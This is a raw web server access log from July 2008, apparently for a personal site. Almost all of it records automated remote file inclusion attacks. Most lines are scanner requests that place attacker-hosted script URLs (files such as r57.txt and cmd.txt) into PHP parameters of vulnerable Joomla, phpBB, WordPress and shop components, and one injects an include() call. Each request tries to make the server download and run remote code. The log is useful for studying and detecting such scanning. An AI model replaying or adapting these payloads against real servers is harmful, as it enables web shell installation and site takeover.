72.243.169.10 - - [29/Jul/2008:10:29:26 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:29:28 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:29:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:29:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:29:35 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:29:42 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:29:43 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:29:48 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:29:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:29:50 -0700] "GET /logs/access_080215.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:29:58 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:30:10 -0700] "GET /errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:30:13 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:30:13 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
59.126.46.141 - - [29/Jul/2008:10:30:20 -0700] "GET /logs/errors.php?error=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:30:45 -0700] "GET /logs/access_080123.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:30:49 -0700] "GET /port.php?content=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:30:52 -0700] "GET /logs/access_080207.log/port.php?content=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:30:52 -0700] "GET /logs/access.log/index.php?x=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.199.200.75 - - [29/Jul/2008:10:30:53 -0700] "GET /logs/port.php?content=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:31:03 -0700] "GET /index.php?x=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.79" "www.dmulk.com"
202.174.82.199 - - [29/Jul/2008:10:31:20 -0700] "GET /logs/index.php?x=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:31:54 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:31:58 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.45.177.194 - - [29/Jul/2008:10:32:09 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:10:32:12 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:32:48 -0700] "GET /logs/access_080301.log/trans.php?trans=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:32:52 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:32:53 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 200 58286 "-" "libwww-perl/5.79" "www.dmulk.com"
59.125.211.84 - - [29/Jul/2008:10:32:54 -0700] "GET //?path%5Bdocroot%5D=http://www.ustaska.pl/editor/idid.txt?%0D?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.79" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:33:32 -0700] "GET /logs/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:33:32 -0700] "GET /logs/errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:33:33 -0700] "GET /errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.150.189.10 - - [29/Jul/2008:10:33:33 -0700] "GET /errors.php?error=http://www.adoradores.kit.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:34:11 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:34:11 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:34:11 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:10:34:12 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:10:34:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:34:21 -0700] "GET /logs/access_080313.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:10:34:23 -0700] "GET /logs/access_080326.log/errors.php?error=http://susanita.de/tests/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.20.210 - - [29/Jul/2008:10:34:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.113.65.228 - - [29/Jul/2008:10:34:38 -0700] "GET /logs/access_080329.log HTTP/1.1" 200 196608 "http://results.freeze.com/index.aspx?type=YT_3_0_ERROR_NA&q=216.133.243.28+3.php&id=%7bBD7500ED-6A71-4010-917C-5C451FBDD9C2%7d" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:35:05 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:10:35:05 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:35:25 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:35:25 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 200 58281 "-" "libwww-perl/5.812" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:10:35:26 -0700] "GET /?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 200 18385 "-" "libwww-perl/5.812" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:35:32 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:35:33 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:35:33 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.234.103 - - [29/Jul/2008:10:35:42 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:36:00 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.76.81 - - [29/Jul/2008:10:36:03 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:10:36:11 -0700] "GET /logs/access.log/errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [29/Jul/2008:10:36:16 -0700] "GET /logs/errors.php?error=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.14.123.10 - - [29/Jul/2008:10:36:30 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:36:49 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:36:51 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:36:53 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:36:54 -0700] "GET /logs/access_080313.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:36:54 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:36:54 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:36:57 -0700] "GET /logs/access_080225.log/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:36:57 -0700] "GET /squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:36:57 -0700] "GET /logs/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:36:59 -0700] "GET /logs/access_080225.log/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:36:59 -0700] "GET /squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:37:00 -0700] "GET /logs/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:37:04 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:37:08 -0700] "GET /logs/access_080118.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:37:08 -0700] "GET /errors.php?error=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:37:17 -0700] "GET /logs/access_080329.log/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:37:19 -0700] "GET /bikes/dteel/WeSTOC07/?M=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:37:22 -0700] "GET /squirrelcart/popup_window.php?site_isp_root=http://www.freewebtown.com/cupu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [29/Jul/2008:10:37:25 -0700] "GET /logs/access_080329.log/squirrelcart/popup_window.php?site_isp_root=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:37:32 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:10:37:33 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:37:36 -0700] "GET /logs/access_080209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:37:36 -0700] "GET /logs/access_080315.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:37:36 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:37:37 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:10:37:43 -0700] "GET /errors.php?error=http://anakdompu.by.ru/special/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.46.184 - - [29/Jul/2008:10:37:50 -0700] "GET /!scanhttp://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:37:55 -0700] "GET /logs/access_080218.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:10:38:12 -0700] "GET /logs/access_080528.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:10:38:44 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [29/Jul/2008:10:38:45 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:10:38:52 -0700] "GET /logs/access_080330.log/main.php?appserv_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:10:38:53 -0700] "GET /main.php?appserv_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.97.229.104 - - [29/Jul/2008:10:38:53 -0700] "GET /logs/main.php?appserv_root=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:39:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
67.212.179.114 - - [29/Jul/2008:10:39:02 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:39:04 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
72.9.145.107 - - [29/Jul/2008:10:39:04 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.emark.sk/new/vnc/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
222.122.6.242 - - [29/Jul/2008:10:39:25 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:10:39:27 -0700] "GET /bikes/dteel/140CANON/?S=D HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
192.192.35.235 - - [29/Jul/2008:10:39:30 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.176.148.129 - - [29/Jul/2008:10:39:36 -0700] "GET /logs/access_080114.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:39:45 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:39:46 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.244.11.20 - - [29/Jul/2008:10:39:46 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:39:55 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:10:39:56 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.45.97.249 - - [29/Jul/2008:10:39:56 -0700] "GET /logs/access_080124.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:39:57 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:39:59 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.180.241.37 - - [29/Jul/2008:10:40:03 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:40:03 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:40:06 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.251.162.130 - - [29/Jul/2008:10:40:07 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:10:40:13 -0700] "GET /logs/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
